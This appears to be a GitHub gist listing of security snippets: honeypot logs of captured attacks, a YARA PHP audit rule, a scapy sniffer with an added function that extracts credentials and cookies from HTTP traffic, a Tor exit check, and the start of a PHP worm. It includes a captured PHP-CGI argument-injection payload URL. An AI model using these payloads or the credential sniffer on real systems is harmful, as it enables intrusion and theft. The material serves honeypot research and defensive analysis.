
@dustyfresh
dustyfresh / shrill-bread
Created February 21, 2017 22:20
codename shrill-bread botnet. Tracking with HoneyPress
> db.payloads.find({codename: 'shrill-bread'}).pretty()
{
	"_id" : ObjectId("58a7b6935bfab60010aaf5de"),
	"requests" : {
		"1427a2c8-f585-11e6-b9ae-0242ac11000d" : {
			"attack_meta" : {
				"target_type" : "wp-login",
				"target_name" : "unknown"
			},
			"time" : "1487386259",
@dustyfresh
dustyfresh / clicker.rs
Created January 28, 2017 23:07
click fast!
/* cargo.toml
[package]
name = "clicker"
version = "0.1.0"
authors = ["dustyfresh"]
[dependencies]
keystroke = "*"
kernel32-sys = "*"
user32-sys = "*"
@dustyfresh
dustyfresh / yara-code-audit.md
Created January 3, 2017 00:19
using YARA for finding bugs in PHP

YARA bad PHP code signatures

$ cat code_audit.yar
rule PHP_INFOLEAK
{
    strings:
        $leak1 = /phpinfo\s?\(|show_source\s?\(|highlight_file\s?\(/
    condition:
        $leak1
}
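The rule above grep-matches three info-leak calls. Two things a reviewer should know before trusting it: YARA regex strings are case-sensitive unless the `nocase` modifier is added, and PHP function names are not, so `PHPINFO(` slips past the rule as written; and a commented-out `phpinfo();` still matches. The following is an added example, not code from the gist, that re-implements the same signature logic in plain Python (no yara-python needed) so those two points can be exercised. `PHP_INFOLEAK` is the page's regex; the extra sink signatures, the comment-line skip and the same-line `$_GET`/`$_POST` taint hint are my additions and flag code worth reading, not confirmed bugs.

```python
import os
import re

# PHP_INFOLEAK is the page's YARA regex. The remaining signatures are my own
# additions (assumption: these are sinks worth a manual look, not proven bugs).
# re.I is used because PHP function names are case-insensitive; the YARA rule
# as written lacks `nocase` and therefore misses `PHPINFO(`.
SIGNATURES = {
    "PHP_INFOLEAK": re.compile(r"phpinfo\s?\(|show_source\s?\(|highlight_file\s?\(", re.I),
    "PHP_CODE_EXEC": re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I),
    "PHP_CMD_EXEC": re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "PHP_FILE_INCLUDE": re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I),
}
# Request data referenced on the same line: a crude hint that the sink is reachable.
USER_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")


def strip_comment(line):
    """Drop whole-line comments so commented-out debug calls do not fire.
    Line-level heuristic only: trailing comments and string literals are not parsed."""
    stripped = line.lstrip()
    if stripped.startswith(("//", "#", "/*", "*")):
        return ""
    return line


def audit_php(source, path="<string>"):
    """Scan PHP source text; return (path, lineno, rule, tainted_hint, code) tuples."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = strip_comment(line)
        if not code:
            continue
        for rule, pattern in SIGNATURES.items():
            if pattern.search(code):
                hits.append((path, lineno, rule, bool(USER_INPUT.search(code)), code.strip()))
    return hits


def audit_tree(root):
    """Run audit_php over every PHP file under root, the way `yara -r` would."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith((".php", ".inc", ".phtml")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits.extend(audit_php(fh.read(), full))
    return hits


# Constructed sample input for this example; not taken from any real project.
SAMPLE_PHP = """<?php
// phpinfo(); left here for debugging, ignored because it is a comment line
$cmd = $_GET['cmd'];
system($cmd);
echo highlight_file(__FILE__);
eval(base64_decode($_POST['x']));
"""

if __name__ == "__main__":
    for path, lineno, rule, tainted, code in audit_php(SAMPLE_PHP, "sample.php"):
        flag = " [request data on same line]" if tainted else ""
        print(f"{path}:{lineno}: {rule}{flag}: {code}")
```

Running it over the sample reports lines 4, 5 and 6 and skips the commented-out `phpinfo()` on line 2; the same-line taint hint is only a triage aid, since `$cmd` on line 4 is tainted one line earlier and the heuristic does not follow assignments.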
@dustyfresh
dustyfresh / honey.py
Last active September 15, 2020 16:42
quick and simple honeypot in python3 using scapy, and raw sockets file logging
#!/usr/bin/env python3
import argparse
import threading
from threading import Thread
from scapy.all import *
import logging
import socket
import chardet
def listen():
@dustyfresh
dustyfresh / sniff-example.py
Last active March 26, 2020 17:25
Sniff packets for secrets with python scapy
#!/usr/bin/env python3
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import re

def packet_callback(packet):
    # sniff() also hands over non-TCP frames unless a BPF filter is set, and
    # packet[TCP] raises on those, so check for the layer first.
    if packet.haslayer(TCP) and packet[TCP].payload:
        pkt = str(packet[TCP].payload)
        if packet[TCP].dport == 80:
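The preview stops where the interesting part begins: what to do with the bytes of a port-80 segment. As an added example, not code from the gist, here is the payload inspection a callback like the one above would call with `bytes(packet[TCP].payload)`. It has no scapy dependency so it can be run offline against a constructed capture. It pulls three kinds of secrets from a plaintext HTTP request: `Authorization: Basic` (decoded to `user:pass`), `Cookie` headers, and credential-looking fields in a form-encoded body (the `log`/`pwd` names are what `wp-login.php` uses; the rest of `CRED_FIELDS` is my assumption). Non-HTTP payloads such as TLS records yield nothing.

```python
import base64
from urllib.parse import parse_qs

# Form fields that commonly carry credentials. `log` and `pwd` are WordPress's
# login field names; the others are an assumption about typical login forms.
CRED_FIELDS = {"log", "pwd", "user", "username", "login", "email", "pass", "passwd", "password"}


def extract_http_secrets(payload):
    """Inspect one plaintext HTTP request and return [(kind, value), ...].

    Reports Authorization: Basic (decoded), Cookie headers and credential fields
    of an application/x-www-form-urlencoded body. Returns [] for non-HTTP bytes.
    """
    findings = []
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")  # latin-1 never raises on binary junk
    if not lines or not lines[0].endswith(("HTTP/1.0", "HTTP/1.1")):
        return findings  # no HTTP request line: TLS, SSH, or a mid-stream segment
    content_type = ""
    for header in lines[1:]:
        name, sep, value = header.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "authorization" and value.lower().startswith("basic "):
            try:
                creds = base64.b64decode(value[6:], validate=True).decode("utf-8", "replace")
                findings.append(("basic-auth", creds))
            except ValueError:  # binascii.Error is a ValueError: keep the raw token
                findings.append(("basic-auth-raw", value[6:]))
        elif name == "cookie":
            findings.append(("cookie", value))
        elif name == "content-type":
            content_type = value.lower()
    if body and content_type.startswith("application/x-www-form-urlencoded"):
        for field, values in parse_qs(body.decode("latin-1")).items():
            if field.lower() in CRED_FIELDS:
                for v in values:
                    findings.append((f"form:{field}", v))
    return findings


# Constructed capture of a WordPress login POST; not real traffic.
SAMPLE_POST = (
    b"POST /wp-login.php HTTP/1.1\r\n"
    b"Host: blog.example\r\n"
    b"Authorization: Basic YWRtaW46aHVudGVyMg==\r\n"  # admin:hunter2
    b"Cookie: wordpress_test_cookie=WP+Cookie+check\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"log=admin&pwd=hunter2&rememberme=forever"
)

if __name__ == "__main__":
    for kind, value in extract_http_secrets(SAMPLE_POST):
        print(f"{kind}: {value}")
```

Hooking this into the sniffer is a one-liner in the callback (`extract_http_secrets(bytes(packet[TCP].payload))`); note that it only sees a request whose headers and body fit in one segment, which is fine for small login POSTs but not for uploads that span several segments.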
@dustyfresh
dustyfresh / do_not_scan.txt
Created October 7, 2016 13:34
textfile of ipv4 ranges to exclude from port scanning
# Martian ranges
0.0.0.0/8
10.0.0.0/8
100.64.0.0/10
127.0.0.0/8
127.0.53.53
169.254.0.0/16
172.16.0.0/12
192.0.0.0/24
192.0.2.0/24
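A list like this is only useful if it is actually subtracted from the target set before the scanner starts. As an added example, not part of the gist, the code below parses the file format above (comments, CIDR ranges, and bare hosts such as `127.0.53.53`, which becomes a `/32`), collapses it, and removes the excluded space from a list of target ranges using only the standard `ipaddress` module. The file contents are embedded verbatim from the lines shown above; the target ranges in the demo are constructed.

```python
import ipaddress

# The exclusion file as shown on the page (the preview is truncated there too).
DO_NOT_SCAN = """
# Martian ranges
0.0.0.0/8
10.0.0.0/8
100.64.0.0/10
127.0.0.0/8
127.0.53.53
169.254.0.0/16
172.16.0.0/12
192.0.0.0/24
192.0.2.0/24
"""


def parse_exclusions(text):
    """Parse one network per line, '#' comments allowed; bare IPs become /32.
    Returns the collapsed list (e.g. 127.0.53.53 disappears into 127.0.0.0/8)."""
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return list(ipaddress.collapse_addresses(nets))


def exclude_ranges(targets, exclusions):
    """Return the target space minus every exclusion, as sorted IPv4Network objects."""
    remaining = [ipaddress.ip_network(t, strict=False) for t in targets]
    for ex in exclusions:
        kept = []
        for net in remaining:
            if not net.overlaps(ex):
                kept.append(net)                      # untouched
            elif ex.supernet_of(net):
                continue                              # wholly excluded, drop it
            else:
                kept.extend(net.address_exclude(ex))  # carve the hole out of net
        remaining = kept
    return sorted(ipaddress.collapse_addresses(remaining))


if __name__ == "__main__":
    exclusions = parse_exclusions(DO_NOT_SCAN)
    # Constructed target ranges for the demo.
    for net in exclude_ranges(["10.0.0.0/7", "192.0.0.0/22", "127.0.53.0/24"], exclusions):
        print(net)
```

The per-exclusion loop is quadratic in the worst case, which is irrelevant for a few dozen ranges; the point worth keeping is that every target range is re-checked against every exclusion, so a target that straddles an excluded block is split rather than dropped or let through whole.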

Payload

> db.payloads.find({ip: '176.94.194.90'}).pretty()
{
	"_id" : ObjectId("577f2c88247fe0000e2831a8"),
	"Tor" : false,
	"ip" : "176.94.194.90",
	"user-agent" : "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
	"triggered_url" : "http://178.62.224.8/phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n",
	"time" : "1467952264",
@dustyfresh
dustyfresh / honeypress-payload-3.md
Created June 22, 2016 16:34
linksys RCE botnet payload caught by HoneyPress

Payload found to be unrelated to WordPress. It seems to be trying to build a botnet by exploiting Linksys E-Series routers.

> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
        "_id" : ObjectId("576a421f83932a00168098be"),
        "Tor" : false,
        "ip" : "179.158.120.213",
        "user-agent" : "Wget(linux)",
        "triggered_url" : "http://178.62.224.8/hndUnblock.cgi",
@dustyfresh
dustyfresh / checkTor.py
Created June 17, 2016 15:37
Check if an IP address is a Tor exit node or not. Requires the requests module.
#!/usr/bin/env python
import requests

def checkTor(ip):
    headers = {'user-agent': 'checkTor'}
    exit_nodes = requests.get('https://check.torproject.org/exit-addresses', headers=headers, timeout=10)
    exit_nodes.raise_for_status()
    # The list carries one "ExitAddress <ip> <timestamp>" line per exit. Compare that
    # field exactly instead of re.search(ip, text): in a regex "." matches any character,
    # and even a plain substring check would let 1.2.3.4 match 11.2.3.45.
    for line in exit_nodes.text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0] == 'ExitAddress' and fields[1] == ip:
            return True
    return False

@dustyfresh

PHP Worm

This worm seems to be defunct now: the C&C servers that this code references (over HTTP) no longer appear to be functioning.

<?php
@ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);